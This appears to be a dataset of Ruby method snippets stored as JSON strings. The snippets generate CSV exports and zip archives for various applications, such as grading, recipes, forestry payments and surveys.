"def create_assignment_csv(args)\n [:path, :urls].each{|arg| args[arg] or raise Error::Argument, \"Missing arg '#{arg}'\" }\n headers = ['audio_url',\n 'project_id',\n 'unusual',\n 'chunk',\n 'chunk_hours',\n 'chunk_minutes',\n 'chunk_seconds',\n 'voices_count',\n (1 .. args[:voices].count).map{|n| [\"voice#{n}\", \"voice#{n}title\"]}\n ].flatten\n csv = args[:urls].map do |url|\n [url, \n local.id,\n args[:unusual].join(', '),\n interval_as_time_string,\n interval_as_hours_minutes_seconds.map{|n| (n == 0) ? nil : n },\n args[:voices].count,\n args[:voices].map{|v| [v[:name], v[:description]]}\n ].flatten\n end\n local.file(*args[:path]).as(:csv).write_arrays(csv, headers)\n local.file_path(*args[:path])\n end",
"def save\n csv = [] # store CSV lines to write to file\n # Iterate over BasicFoods and retrieve CSV format for each \n @basic_foods.each do |key, basic_food|\n csv.push(basic_food.csv)\n end\n # Iterate over Recipes and retrieve CSV format for each\n @recipes.each do |key, recipe|\n csv.push(recipe.csv)\n end\n File.write('FoodDB.txt', csv.join(\"\\n\")) # Write CSV lines to file\n end",
"def generate_simple_submission_solution_files(zip)\n # Create solution directory and create solution files\n zip.put_next_entry 'solution/'\n zip.put_next_entry 'solution/template'\n zip.print @test_params[:solution]\n\n # # Create submission directory with template file\n zip.put_next_entry 'submission/'\n zip.put_next_entry 'submission/template'\n zip.print @test_params[:submission]\n zip.print \"\\n\"\n end",
"def generateCSV()\n findCommits\n findLinesOfCode\n\n CSV.open(\"data.csv\", \"wb\") {|csv| @students.to_a.each {|elem| csv << elem} }\nend",
"def generate_batch_task_zip(user, tasks, unit)\n download_id = \"#{Time.new.strftime(\"%Y-%m-%d\")}-#{unit.code}-#{current_user.username}\"\n filename = FileHelper.sanitized_filename(\"batch_ready_to_mark_#{current_user.username}.zip\")\n output_zip = Tempfile.new(filename)\n # Create a new zip\n Zip::File.open(output_zip.path, Zip::File::CREATE) do | zip |\n csv_str = mark_csv_headers\n # Add individual tasks...\n tasks.select { |t| t.group_submission.nil? }.each do | task |\n # Skip tasks that do not yet have a PDF generated\n next if task.processing_pdf\n # Add to the template entry string\n student = task.project.student\n if task.status == :need_help\n mark_col = 'need_help'\n else\n mark_col = 'rtm'\n end\n csv_str << \"\\n#{student.username.gsub(/,/, '_')},#{student.name.gsub(/,/, '_')},#{task.project.tutorial.abbreviation},#{task.task_definition.abbreviation.gsub(/,/, '_')},#{task.id},\\\"#{task.last_comment_by(task.project.student).gsub(/\"/, \"\\\"\\\"\")}\\\",\\\"#{task.last_comment_by(user).gsub(/\"/, \"\\\"\\\"\")}\\\",#{mark_col},,\"\n\n src_path = task.portfolio_evidence\n\n next if src_path.nil? || src_path.empty?\n next unless File.exists? src_path\n\n # make dst path of \"<student id>/<task abbrev>.pdf\"\n dst_path = FileHelper.sanitized_path(\"#{task.project.student.username}\", \"#{task.task_definition.abbreviation}-#{task.id}\") + \".pdf\"\n # now copy it over\n zip.add(dst_path, src_path)\n end\n # Add group tasks...\n tasks.select { |t| t.group_submission }.group_by { |t| t.group_submission } .each do | subm, tasks |\n task = tasks.first\n # Skip tasks that do not yet have a PDF generated\n next if task.processing_pdf\n\n # Add to the template entry string\n grp = task.group\n next if grp.nil?\n csv_str << \"\\nGRP_#{grp.id}_#{subm.id},#{grp.name.gsub(/,/, '_')},#{grp.tutorial.abbreviation},#{task.task_definition.abbreviation.gsub(/,/, '_')},#{task.id},\\\"#{task.last_comment_not_by(user).gsub(/\"/, \"\\\"\\\"\")}\\\",\\\"#{task.last_comment_by(user).gsub(/\"/, \"\\\"\\\"\")}\\\",rtm,,\"\n\n src_path = task.portfolio_evidence\n\n next if src_path.nil? || src_path.empty?\n next unless File.exists? src_path\n\n # make dst path of \"<student id>/<task abbrev>.pdf\"\n dst_path = FileHelper.sanitized_path(\"#{grp.name}\", \"#{task.task_definition.abbreviation}-#{task.id}\") + \".pdf\"\n # now copy it over\n zip.add(dst_path, src_path)\n end\n\n # Add marking file\n zip.get_output_stream(\"marks.csv\") { | f | f.puts csv_str }\n\n # Add readme file\n zip.get_output_stream(\"readme.txt\") { | f | f.puts readme_text }\n end\n output_zip\n end",
"def create_csv_for_LLR(csv_data)\n\n csv_string = CSV.open(\"#{$basefile}LLR.csv\", \"wb\") do |csv|\n\n csv << csv_data.first.keys\n csv_data.each do |hash|\n csv << hash.values\n end\n end\n end",
"def make_history_csv\n FileUtils.mkdir_p(@@csv_location.dirname) unless Dir.exist?(csv_location.dirname)\n create_stub_csv_file unless File.exist?(@@csv_location)\n end",
"def build_csv()\n\t\tconcat_path = \"#{@location}/#{@name}.csv\"\n\n\t\tCSV.open(concat_path, 'wb') do |csv_line|\n\t\t\t\t\t\n\t\t\theaders = ['movie_date', 'title', 'lifetime_gross_sales']\n\t\t\tcsv_line << headers\n\n\t\t\t@cage.each do |cage|\n\t\t\t\tcsv_line << [cage[:movie_date], cage[:title], cage[:life_time_gross]]\n\t\t\tend\n\t\tend\n\tend",
"def export_csv\n # Find all Setup with the stored restrictions\n sorting :default => @@default_sort\n collection = @@model.find :all, :order => @sort, :conditions => session[:conditions]\n # Creation of the file\n file_name = \"#{@@param_name}_export_\" + current_user.id.to_s + \".csv\"\n \n csv_string = CSV.generate({:col_sep => ';', :encoding => \"ISO-8859-15\" }) do |csv|\n csv << @@name_print.map{|n| n.trn}\n collection.each do |element|\n csv << @@field_print.map{|f| element[f]}\n end\n end\n send_data Iconv.conv('iso-8859-1//IGNORE', 'utf-8', csv_string), :filename => file_name, :disposition => 'attachment', :type => 'text/csv; charset=iso-8859-1; header=present'\n end",
"def process_and_upload_csv\n\n @has_data = get_data_from_db do |data|\n formatted_data = format_data(data)\n c_add formatted_data\n end\n\n if @has_data\n zip_folder\n upload_to_s3\n delete_local_files\n end\n\n end",
"def save_wizards\n #open the file for writing\n file = File.open(\"wizards.csv\", \"w\")\n # iterate over the array of save_wizards\n @wizards.each do |wizard|\n wizard_data = [wizard[:name], wizard[:house]]\n csv_line = wizard_data.join(\",\")\n file.puts csv_line\n end\n file.close\nend",
"def zip_qrda_files\n file_name = name.gsub(/[^0-9A-Za-z]/, '_')\n FileUtils.mkdir_p(\"public/data/#{user_id}\")\n update_attribute(:file_path, \"data/#{user_id}/#{file_name}.zip\")\n Zip::ZipOutputStream.open('public/' + file_path) do |zip|\n i = 0\n document_ids.shuffle.each do |document_id|\n doc = Document.find(document_id)\n doc.update_attribute(:test_index, i)\n doc.update_attribute(:name, i.to_s.rjust(4, '0') + ' - ' + doc.name)\n zip.put_next_entry(\"#{doc.name}.xml\")\n zip << doc.qrda\n i += 1\n end\n end\n end",
"def create_finals_file\n file = File.open('final.csv', 'w')\n $students.each do |student|\n name = student[:name]\n avg = get_avggrades(student)\n file.puts \"#{name} #{avg}\"\n end\n file.close\nend",
"def generate_standard_submission_solution_files(zip, submission_files_to_keep, solution_files_to_keep)\n zip.mkdir('submission')\n @test_params[:submission_files].try(:each) do |file|\n next if file.nil?\n\n zip.add(\"submission/#{file.original_filename}\", file.tempfile.path)\n end\n\n submission_files_to_keep.each do |file|\n zip.add(\"submission/#{File.basename(file.path)}\", file.path)\n end\n\n zip.mkdir('solution')\n @test_params[:solution_files].try(:each) do |file|\n next if file.nil?\n\n zip.add(\"solution/#{file.original_filename}\", file.tempfile.path)\n end\n\n solution_files_to_keep.each do |file|\n zip.add(\"solution/#{File.basename(file.path)}\", file.path)\n end\n end",
"def export_the_thing\n #First, the file name, path and table headers will be set according to given id \n if params[:id] == \"1\"\n @jobs = Job.all\n \n #Same filepath thingy here as above\n @filename = \"Jobs_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Jobs\"\n @table_headers = \"Name, Owner Name, Logger Name, Trucker Name, HFI-rate (%), HFI-prime\" \n end\n \n if params[:id] == \"2\"\n @tickets = Ticket.all\n \n @filename = \"Tickets_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Tickets\"\n \n @species = \"\"\n Specie.all.each do |i|\n @species = \"#{@species}, #{i.code}\"\n end\n \n @table_headers = \"Number, Delivery Date, Destination Name, Job Name, Wood Type#{@species}, Tonnage, Net MBF, Load Pay, Logger Pay, Trucker Pay, HFI Pay, Owner Pay\" \n end\n if params[:id] == \"3\"\n @payments = PaymentFromDestination.all\n \n @filename = \"Payments_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Payments\"\n @table_headers = \"Date, Destination Name, Job Name, Payment #, Wood Type, Net MBF, Tonnage, Total Payment\" \n end\n if params[:id] == \"4\"\n @receipts = Receipt.all\n \n @filename = \"Receipts_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Receipts\"\n @table_headers = \"Date, Job Name, Owner Type, Owner Name, Payment #, # of Tickets, Total Payment\" \n end\n\n \n #Then, file is created with name and path set above and the headers are written to the file\n #After writing the headers, the data according to given id is written.\n File.open(\"#{@file_path}#{@filename}\", \"w\") do |writer|\n writer.puts @table_name\n writer.puts @table_headers\n \n if params[:id] == \"1\"\n @jobs.each do |i|\n @puts = \"#{i.name}, #{i.owner.name.gsub(',', '')}, #{i.logger.name.gsub(',', '')}, #{i.trucker.name.gsub(',', '')}, #{i.hfi_rate}, #{i.hfi_prime}\"\n writer.puts @puts\n end\n end\n \n if params[:id] == \"2\"\n @tickets.each do |i|\n @amounts = []\n \n Specie.all.each do\n @amounts.push(0)\n end\n \n i.load_details.each do |j|\n unless j.mbfs.nil?\n @amounts[j.species_id-1] = j.mbfs\n else\n @amounts[j.species_id-1] = 0\n end\n end\n \n @amounts_str = \"\"\n @amounts.each do |j|\n @amounts_str = \"#{@amounts_str}, #{j}\"\n end\n \n if i.logger_rate.nil? \n i.logger_value = 0\n else\n \n if i.logger_rate.rate_type == \"MBF\"\n i.logger_value = i.net_mbf * i.logger_rate.rate\n i.logger_value = i.logger_value.round(2)\n end\n if i.logger_rate.rate_type == \"Tonnage\"\n i.logger_value = i.tonnage * i.logger_rate.rate\n i.logger_value = i.logger_value.round(2)\n end\n if i.logger_rate.rate_type == \"percent\"\n i.logger_value = i.value * (i.logger_rate.rate/100)\n i.logger_value = i.logger_value.round(2)\n end\n end\n \n if i.trucker_rate.nil?\n i.trucker_value = 0\n else\n if i.trucker_rate.rate_type == \"MBF\"\n i.trucker_value = round_to(i.trucker_rate.rate*i.net_mbf, 2)\n else\n if i.trucker_rate.rate_type == \"Tonnage\"\n i.trucker_value = round_to(i.trucker_rate.rate*i.tonnage, 2)\n else\n i.trucker_value = round_to(i.trucker_rate.rate/100*i.value, 2)\n end\n end\n end\n \n if i.job.hfi_rate.nil?\n i.hfi_value = 0\n else\n i.hfi_value = (i.job.hfi_rate/100)*i.value\n end\n \n i.owner_value = i.value - i.hfi_value - i.logger_value - i.trucker_value\n \n @puts = \"#{i.number}, #{i.delivery_date}, #{i.destination.name.gsub(',', '')}, #{i.job.name.gsub(',', '')}, \"\n @puts << \"#{WoodType.find(i.wood_type).name}#{@amounts_str}, #{i.tonnage}, #{i.net_mbf}, #{give_pennies(i.value).gsub(',', '')}, #{give_pennies(i.logger_value).gsub(',', '')}, #{give_pennies(i.trucker_value).gsub(',', '')}, #{give_pennies(i.hfi_value).gsub(',', '')}, #{give_pennies(i.owner_value).gsub(',', '')}\"\n writer.puts @puts\n end\n end\n \n if params[:id] == \"3\"\n @payments.each do |i|\n @puts = \"#{i.payment_date}, #{i.destination.name.gsub(',', '')}, #{i.job.name.gsub(',', '')}, #{i.payment_num}, \"\n @puts << \"#{WoodType.find(i.wood_type).name}, #{i.tonnage}, #{i.net_mbf}, \"\n @puts << \"#{give_pennies(i.total_payment).gsub(',', '')}\"\n writer.puts @puts\n end\n end\n \n if params[:id] == \"4\"\n @receipts.each do |i|\n if i.owner_type == \"owner\"\n @puts = \"#{i.receipt_date}, #{i.job.name.gsub(',', '')}, #{i.owner_type}, #{Owner.find(i.owner_id).name.gsub(',', '')}, #{i.payment_num}, \"\n @puts << \"#{i.tickets.count}, #{i.total_payment.to_s}\"\n else\n if i.owner_type == \"hfi\"\n @puts = \"#{i.receipt_date}, #{i.job.name.gsub(',', '')}, #{i.owner_type}, Halme Forestry Inc, #{i.payment_num}, \"\n @puts << \"#{i.tickets.count}, #{i.total_payment.to_s}\"\n else \n @puts = \"#{i.receipt_date}, #{i.job.name.gsub(',', '')}, #{i.owner_type}, #{Partner.find(i.owner_id).name.gsub(',', '')}, #{i.payment_num}, \"\n @puts << \"#{i.tickets.count}, #{i.total_payment.to_s}\"\n end\n end\n writer.puts @puts \n end\n end\n \n end\n \n #Written file is opened for sending and sent\n @file = File.open(\"#{@file_path}#{@filename}\", \"r\")\n \n send_data(@file.read, :type => \"csv\", :filename => @filename)\n end",
"def to_csv(path = nil)\n path = File.basename(@data.path, '.adt') + '.csv' if path.nil?\n FCSV.open(path, 'w', :force_quotes => true) do |csv|\n each do |record|\n csv << record.to_a\n end\n end\n end",
"def save_as_csv\n CSV.open(\"./db/#{@name}.csv\", \"wb\") {|csv| @result_scrap.to_a.each {|elem| csv << elem} }\n end",
"def export_csv(csv_data)\n\t\tFile.write(\"kfit_partners.csv\", csv_data.map(&:to_csv).join)\n\tend",
"def generateCSV data\n CSV.open(\"schools.csv\", \"wb\") do |csv|\n csv << [ \"school_name\", \"school_address\", \"school_type\", \"school_url\", \"school_area\"]\n data.each do |cell|\n csv << [ cell[\"school_name\"], cell[\"school_address\"], cell[\"school_type\"], cell[\"school_url\"], cell[\"school_area\"]]\n end\n end\nend",
"def csv_string\n CSV.generate do |csv|\n header.write_header csv\n records.each {|r| r.write_record csv}\n end\n end",
"def extract_csv_files_from_zipped_databases(zip_file_paths)\n zip_file_paths.map do |zip_file_path|\n base_directory = File.dirname(zip_file_path)\n filename_wo_ext = File.basename(zip_file_path, \".zip\")\n extraction_directory = File.join(base_directory, filename_wo_ext)\n\n puts \"Creating extraction directory: #{extraction_directory}\"\n FileUtils.mkdir_p(extraction_directory)\n\n puts \"Processing #{zip_file_path}:\"\n extracted_paths = []\n Zip::File.open(zip_file_path) do |zip_file|\n zip_file.each do |entry|\n # Extract each file\n destination_path = File.join(extraction_directory, entry.name)\n log \"Extracting #{entry.name} -> #{destination_path}\"\n if !File.exists?(destination_path)\n entry.extract(destination_path)\n end\n extracted_paths << destination_path\n end\n end\n extracted_paths\n end.flatten.uniq\n end",
"def extract_csv_files_from_zipped_databases(zip_file_paths)\n zip_file_paths.map do |zip_file_path|\n base_directory = File.dirname(zip_file_path)\n filename_wo_ext = File.basename(zip_file_path, \".zip\")\n extraction_directory = File.join(base_directory, filename_wo_ext)\n\n puts \"Creating extraction directory: #{extraction_directory}\"\n FileUtils.mkdir_p(extraction_directory)\n\n puts \"Processing #{zip_file_path}:\"\n extracted_paths = []\n Zip::File.open(zip_file_path) do |zip_file|\n zip_file.each do |entry|\n # Extract each file\n destination_path = File.join(extraction_directory, entry.name)\n log \"Extracting #{entry.name} -> #{destination_path}\"\n if !File.exists?(destination_path)\n entry.extract(destination_path)\n end\n extracted_paths << destination_path\n end\n end\n extracted_paths\n end.flatten.uniq\n end",
"def create_downloads(config, files)\n downloads = []\n # Write\n files&.each do |file|\n content_type = config[:format] == 'csv' ? 'text/csv' : 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n downloads << create_download(config[:user_id], file[:content], file[:filename], config[:export_type], content_type)\n end\n downloads\n end",
"def save_to_csv(jobs)\n CSV.open('../docs/cryptocurrencyjobslist.csv', 'wb') do |csv|\n csv << [\"Company\", \"Title\", \"Link\", \"Location\", \"Category\"]\n for i in 0..jobs.length-1\n csv << [jobs[i].company, jobs[i].title, jobs[i].listing_url, jobs[i].location, jobs[i].category]\n end\n end\nend",
"def save_csv\n CSV.open(@csv_file_path, 'wb') do |csv|\n @recipes.each do |recipe|\n csv << [recipe.name, recipe.description, recipe.rating, recipe.prep_time, recipe.tried]\n end\n end\n end",
"def index\n @initial_surveys = InitialSurvey.all\n respond_to do |format|\n format.html { render :action => \"index\" }\n format.csv { send_data InitialSurvey.to_csv(@initial_surveys) }\n end\n end",
"def generate\n @report = Report.find_or_initialize_by_key(params[:id])\n @report.generate_csv_zip\n @report.save\n redirect_to @report.csv.url\n end",
"def compressFiles\n Dir.chdir(\"#{@outputDir}/RDPsummary\")\n #system(\"tar -zcf #{@sampleSetName1}.tar.gz * --exclude=*.log --exclude=*.sra --exclude=*.sff --exclude=*.local.metadata\")\n system(\"tar czf class.result.tar.gz class\")\n system(\"tar czf domain.result.tar.gz domain\")\n system(\"tar czf family.result.tar.gz family\")\n system(\"tar czf genus.result.tar.gz genus\")\n system(\"tar czf order.result.tar.gz order\")\n system(\"tar czf phyla.result.tar.gz phyla\")\n system(\"tar czf species.result.tar.gz species\")\n system(\"tar czf pdf.result.tar.gz 'find . -name `*.pdf`'\")\n Dir.chdir(@scratch)\n end",
"def csv_export(config, patients, inner_batch_size)\n # Get all of the field data based on the config\n field_data = get_field_data(config, patients)\n\n # Determine selected data types for export\n data_types = CUSTOM_EXPORT_OPTIONS.keys.select { |data_type| field_data.dig(data_type, :checked).present? }\n\n files = []\n csvs = {}\n packages = {}\n\n data_types.each do |data_type|\n # Create CSV with column headers\n package = CSV.generate(headers: true) do |csv|\n csv << field_data.dig(data_type, :headers)\n csvs[data_type] = csv\n end\n packages[data_type] = package\n end\n\n # NOTE: in_batches appears to NOT sort within batches, so explicit ordering on ID is also done deeper down.\n # The reorder('') here allows this ordering done later on to work properly.\n patients.reorder('').in_batches(of: inner_batch_size).each do |batch_group|\n # Get export data in batches to decrease size of export data hash maintained in memory\n exported_data = get_export_data(batch_group.order(:id), config[:data], field_data)\n data_types.each do |data_type|\n exported_data[data_type]&.each { |record| csvs[data_type] << record }\n end\n end\n\n data_types.each do |data_type|\n files << { filename: build_export_filename(config, nil), content: StringIO.new(packages[data_type]) }\n end\n files\n end",
"def csvexport_all_tables\n @wires = Wire.all.sort_by {|obj| obj.kabeltyp}\n @switchgears_einbau = Switchgear.all.sort_by {|obj| obj.kennung}\n @switchgears = Switchgear.where(:typ => 1).sort_by {|obj| obj.kennung}\n @assemblies = Assembly.all.sort_by {|obj| obj.kennung}\n @electrical_installations = ElectricalInstallation.all.sort_by {|obj| obj.kennung}\n @drives = Drive.all.sort_by {|obj| obj.kennung}\n @devices = Device.all.sort_by {|obj| obj.definition}\n @iogroups = Iogroup.all.sort_by {|obj| obj.name}\n @switchgearcombinations = Switchgearcombination.all.sort_by {|obj| obj.name}\n @offertpositions = Offertposition.where(:subsubproject_id => params[:subsubproject_id]).sort_by {|obj| obj.name}\n @subsubproject = Subsubproject.find(params[:subsubproject_id])\n @subsubprojects = @subsubproject.subproject.subsubprojects.sort_by {|obj| obj.name}\n @subsystems = @subsubproject.subproject.project.subsystems.all.sort_by {|obj| obj.name}\n @units = Unit.where(:subsystem_id => @subsystems.pluck(:id)).sort_by {|obj| obj.name}\n\n CSV.open(\"export_all_tables#{Time.now.strftime(\"%Y-%m-%d-%H-%M\")}.csv\", \"wb\", {:headers => true, :encoding => \"iso-8859-1\", :col_sep => \";\"}) do |csv|\n csv << ['Geraetetypen', '']\n @devices.each do |entry| csv << [entry.id, entry.definition] end\n csv << ['SPS-Modultypen', '']\n @assemblies.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Frequenzumrichtertypen', '']\n @drives.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Kabeltypen', '']\n @wires.each do |entry| csv << [entry.id, entry.kabeltyp] end\n csv << ['Elektroinstallationstypen', '']\n @electrical_installations.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Schaltschranktypen', '']\n @switchgears.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Schaltschrankeinbautypen', '']\n @switchgears_einbau.each do |entry| csv << [entry.id, entry.kennung] end\n csv << ['Schaltgeraetekombinationen', '']\n @switchgearcombinations.each do |entry| csv << [entry.id, entry.name] end\n csv << ['IO-Gruppen', '']\n @iogroups.each do |entry| csv << [entry.id, entry.name] end\n csv << ['Offertpositionen', '']\n @offertpositions.each do |entry| csv << [entry.id, entry.name] end\n csv << ['Teilanlagen', '']\n @subsystems.each do |entry| csv << [entry.id, entry.name] end\n csv << ['TeilanlagenUnits', '']\n @units.each do |entry| csv << [entry.id, entry.name] end\n csv << ['Projektversionen', '']\n @subsubprojects.each do |entry| csv << [entry.id, entry.name] end\n end\n\n redirect_to settings_path, :notice => \"Export wurde unter \" + Rails.root.to_s + \"/ abgelegt!\"\n end",
"def create_stub_csv_file\n File.rm(@@csv_location) if File.exist?(@@csv_location)\n CSV.open(@@csv_location, 'w') do |row|\n row << @@csv_headers\n end\n end",
"def writeCSV(file_name)\n generated_array = transaction(file_name)\n array_from_csv = read_file(file_name)\n final_hash = merge_arrays(array_from_csv, generated_array)\n binding.pry\n\n CSV.open(\"results.csv\", \"w\") do |row|\n final_hash.each do |nested_hash|\n row << [nested_hash[\"SKU\"], nested_hash[\"quantity\"]]\n end #end each nested_hash loop\n end #end csv loop\nend",
"def create_zip( ctx, file:, upload_dir:, archive_dir:, ** ) #File::Twin\n source_files = file.records\n\n zip_file = File.join( archive_dir, \"#{file.identifier}.zip\" )\n\n return false if File.exists?(zip_file)\n\n Zip::File.open(zip_file, Zip::File::CREATE) do |zip|\n source_files.each do |record|\n raise \"error with #{record.inspect}\" unless record.file_path # TODO: remove me\n\n name_in_zip = \"#{record.index}-#{File.basename(record.file_path)}\"\n\n zip.add( name_in_zip, File.join(upload_dir, record.file_path) ) # FIXME: this could break\n end\n end\n\n\n\n ctx[:zip] = zip_file\n end",
"def get_csv\n CSV.generate do |csv|\n csv << ['Name','Student ID','User ID','Role','Email Address','Sections']\n get_feed[:students].each do |student|\n name = student[:last_name] + ', ' + student[:first_name]\n user_id = student[:login_id]\n student_id = student[:student_id]\n email_address = student[:email]\n role = ENROLL_STATUS_TO_CSV_ROLE[student[:enroll_status]]\n sections = sections_to_name_string(student[:sections])\n csv << [name, student_id, user_id, role, email_address, sections]\n end\n end\n end",
"def create_dirs_in_zipfile(created_dirs, entry_path, output_stream); end",
"def export_csv\n # Find all Setup with the stored restrictions\n sorting :default => \"name\"\n collection = PostitTask.find :all, :order => @sort, :conditions => session[:conditions]\n # Creation of the file\n file_name = \"postit_task_export_\" + current_user.id.to_s + \".csv\"\n \n csv_string = CSV.generate({:col_sep => ';', :encoding => \"ISO-8859-15\" }) do |csv|\n csv << [\"Nom\".trn,\"Description\".trn,\"Séquence\".trn]\n collection.each do |element|\n csv << [element.name,element.description,element.sequence]\n end\n end\n send_data Iconv.conv('iso-8859-1//IGNORE', 'utf-8', csv_string), :filename => file_name, :disposition => 'attachment', :type => 'text/csv; charset=iso-8859-1; header=present'\n end",
"def create(data)\n file = File.open(@file, \"w\")\n CSV(file, col_sep: \",\") do |csv|\n csv << data.map{ |test| test[:identifier] }\n csv << data.map{ |test| test[:runtime] }\n end\n file.close\n end",
"def csv_export(export, dir, locale)\n status = \"ready\"\n\n begin\n Dump::CSVDump.new.dump(\n export.catalog.slug,\n File.join(dir, 'csv'),\n locale,\n export.with_files\n )\n zip(dir, export.pathname)\n rescue StandardError => e\n status = \"error\"\n Rails.logger.error \"[ERROR] Catalog dump: #{e.message}\"\n end\n\n export.update(status: status)\n send_mail(export)\n end",
"def create_file(storage_path, csv_record)\n FileUtils.mkdir_p(storage_dir)\n\n CSV.open(storage_path, 'ab') do |csv|\n csv << csv_record.keys\n end\n end",
"def export_files\n begin\n file_to_download = \"sample_non_compliance_question.csv\"\n send_file Rails.public_path + file_to_download, :type => 'text/csv; charset=iso-8859-1; header=present', :disposition => \"attachment; filename=#{file_to_download}\", :stream => true, :buffer_size => 4096\n rescue\n flash[:error] = MESSAGES[\"csv_export\"][\"error\"]\n redirect_to new_audit_path\n end\n end",
"def to_csv()\n all = general_info_csv() + \"\\r\\n\" +\n teacher_for_csv() + \"\\r\\n\" +\n contributor_to_csv() + \"\\r\\n\" +\n published_in_csv() + \"\\r\\n\" +\n text_fields_csv()\n all\n end",
"def write_batch_data\n data = []\n # Loop through each row of data\n @document.xpath('//Row').each do |xml_row|\n row = []\n # Loop through each column value\n @column_names.keys.each do |column|\n row.append(xml_row.xpath(column).text)\n end\n data.append(row)\n end\n\n # Write the data to a csv file\n CSV.open(csv_file_path, 'a') do |csv|\n # Add each row by row\n data.each do |row|\n csv << row\n end\n end\n end",
"def export_designs_csv(oligo_designs)\r\n xfmt = ExportField::EXPORT_FMT\r\n csv_string = CSV.generate(:col_sep => \"\\t\") do |csv|\r\n csv << (ExportField.headings(xfmt) << 'Extract_Date')\r\n\r\n oligo_designs.each do |oligo_design|\r\n fld_array = []\r\n oligo_annotation = oligo_design.oligo_annotation\r\n\r\n ExportField.fld_names(xfmt).each do |model, fld|\r\n if model == 'oligo_design'\r\n fld_array << oligo_design.send(fld) \r\n\r\n elsif model == 'oligo_annotation'\r\n fld_array << oligo_annotation.send(fld) if oligo_annotation\r\n fld_array << ' ' if oligo_annotation.nil?\r\n end\r\n end\r\n\r\n csv << (fld_array << Date.today.to_s)\r\n end\r\n end\r\n return csv_string\r\n end",
"def create_scale_results_csv_file(scale_results_parent_dir)\n CSV.open(\"#{scale_results_parent_dir}/PERF_SCALE_#{@scale_timestamp}.csv\", \"wb\") do |csv|\n headings = [\"agents\",\n \"ok\",\n \"ko\",\n \"combined mean\",\n \"catalog mean\",\n \"filemeta plugins mean\",\n \"filemeta pluginfacts mean\",\n \"locales mean\",\n \"node mean\",\n \"report mean\",\n \"average CPU %\",\n \"average memory\"]\n\n csv << headings\n end\n end",
"def to_a11_submissions_csv(start_date:, end_date:)\n non_flagged_submissions = self.submissions.non_flagged.where(\"created_at >= ?\", start_date).where(\"created_at <= ?\", end_date)\n return nil unless non_flagged_submissions.present?\n\n header_attributes = [\n \"standardized_question_number\",\n \"standardized_question_identifier\",\n \"customized_question_text\",\n \"likert_scale_1\",\n \"likert_scale_2\",\n \"likert_scale_3\",\n \"likert_scale_4\",\n \"likert_scale_5\",\n \"response_volume\",\n \"notes\",\n \"start_date\",\n \"end_date\"\n ]\n\n @hash = {\n answer_01: Hash.new(0),\n answer_02: Hash.new(0),\n answer_03: Hash.new(0),\n answer_04: Hash.new(0),\n answer_05: Hash.new(0),\n answer_06: Hash.new(0),\n answer_07: Hash.new(0)\n }\n\n # Aggregate likert scale responses\n non_flagged_submissions.each do |submission|\n @hash.keys.each do |field|\n response = submission.send(field)\n if response.present?\n @hash[field][submission.send(field)] += 1\n end\n end\n end\n\n # TODO: Needs work\n CSV.generate(headers: true) do |csv|\n csv << header_attributes\n\n @hash.each_pair do |key, values|\n @question_text = \"123\"\n if key == :answer_01\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 1\n elsif key == :answer_02\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 2\n elsif key == :answer_03\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 3\n elsif key == :answer_04\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 4\n elsif key == :answer_05\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 5\n elsif key == :answer_06\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 6\n elsif key == :answer_07\n question = questions.where(answer_field: key).first\n response_volume = values.values.collect { |v| v.to_i }.sum\n @question_text = question.text\n standardized_question_number = 7\n end\n\n csv << [\n standardized_question_number,\n key,\n @question_text,\n values[\"1\"],\n values[\"2\"],\n values[\"3\"],\n values[\"4\"],\n values[\"5\"],\n response_volume,\n \"\", # Empty field for the user to enter their own notes\n start_date,\n end_date\n ]\n end\n\n end\n end",
"def genDataZip(dir='generated', file_name='OdinSampleDataSet.zip', zip_dir='generated')\n # make sure the target file does not already exist\n # if it does, rename it to a tmp file\n runShellCommand(\"zip -j #{dir}/#{file_name} #{zip_dir}/*.xml #{zip_dir}/*.ctl\")\nend",
"def add_files(zip)\n ZipFileGenerator.new(@manifest.base_dir, zip).write\n end",
"def to_csv\n initialize_generator\n csv_report_generator.records = pull_join\n csv_report_generator.generate_report\n end",
"def write()\n entries = Dir.entries(@inputDir); entries.delete(\".\"); entries.delete(\"..\"); entries.delete(\"yamproject.json\"); entries.delete(\".DS_Store\")\n io = Zip::File.open(@outputFile, Zip::File::CREATE);\n writeEntries(entries, \"\", io)\n io.close();\n end",
"def csv_writer(rows)\n headers = [\"name\", \"capacity\", \"storage\"]\n CSV.open(\"reservoir_data.csv\", 'w') do |csv|\n csv << headers\n rows.each do |row|\n csv << row\n end\n end\nend",
"def index\n @surveys = Survey.all\n\n respond_to do |format|\n format.html\n #format.csv { send_data @surveys.to_csv }\n end\n end",
